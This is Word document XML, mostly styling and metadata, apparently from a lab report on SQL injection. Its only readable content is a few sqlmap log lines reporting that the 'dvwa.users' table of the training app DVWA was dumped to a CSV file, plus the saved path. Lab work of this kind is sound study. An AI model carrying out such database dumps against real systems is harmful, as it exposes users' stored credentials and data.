    <w:p w:rsidR="00791768" w:rsidRPr="00791768" w:rsidRDefault="00791768" w:rsidP="00791768">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pP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[17:54:04] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/dvwa/dump/dvwa/users.csv'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791768" w:rsidRPr="00791768"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[17:54:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/dvwa'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791768" w:rsidRPr="00791768" w:rsidRDefault="00791768" w:rsidP="00791768">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C76A3E" w:rsidRDefault="00791768" w:rsidP="00791768">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791768">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[*] ending @ 17:54:04 /2025-11-25/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000465FF" w:rsidRDefault="000465FF" w:rsidP="00791768">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000465FF" w:rsidRDefault="000465FF" w:rsidP="00791768">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000465FF" w:rsidRDefault="000465FF" w:rsidP="00791768">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000465FF" w:rsidRPr="00791768" w:rsidRDefault="000465FF" w:rsidP="00791768">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Output is saved at:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000465FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="000465FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>kali-home</w:t>
      </w:r>
      <w:r w:rsidRPr="000465FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/.local/share/sqlmap/output/dvwa/dump/dvwa/users.csv'</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000465FF" w:rsidRPr="00791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10E45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5810C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7322C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F81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632237"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5AA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63300"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C28C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F40709"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23585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069D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68305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7750605">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1245340187">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1307589141">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="334498527">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2068795079">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="920334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FC"/>
    <w:rsid w:val="000465FF"/>
    <w:rsid w:val="00095D5C"/>
    <w:rsid w:val="000A6CDA"/>
    <w:rsid w:val="002631FF"/>
    <w:rsid w:val="003F04DE"/>
    <w:rsid w:val="004A3A23"/>
    <w:rsid w:val="00545F18"/>
    <w:rsid w:val="005B4006"/>
    <w:rsid w:val="006C5478"/>
    <w:rsid w:val="00791768"/>
    <w:rsid w:val="009E6AFC"/>
    <w:rsid w:val="00BC776A"/>
    <w:rsid w:val="00C76A3E"/>
    <w:rsid w:val="00D66A07"/>
    <w:rsid w:val="00E41C74"/>
    <w:rsid w:val="00EA4164"/>
    <w:rsid w:val="00EE0EB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753B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{177D481F-9FAB-D245-B0FA-A5070063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6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A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A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A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A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6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AFC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009E6A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A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A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6AFC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009E6AFC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="009E6AFC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="009E6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AFC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="009E6AFC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E6AFC"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E6AFC"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E6AFC"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E6AF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6AFC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E6A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7784">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="119959283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="999430978">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="166489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3793</Words>
  <Characters>21625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Smith</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Smith</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-18T08:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-25T18:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>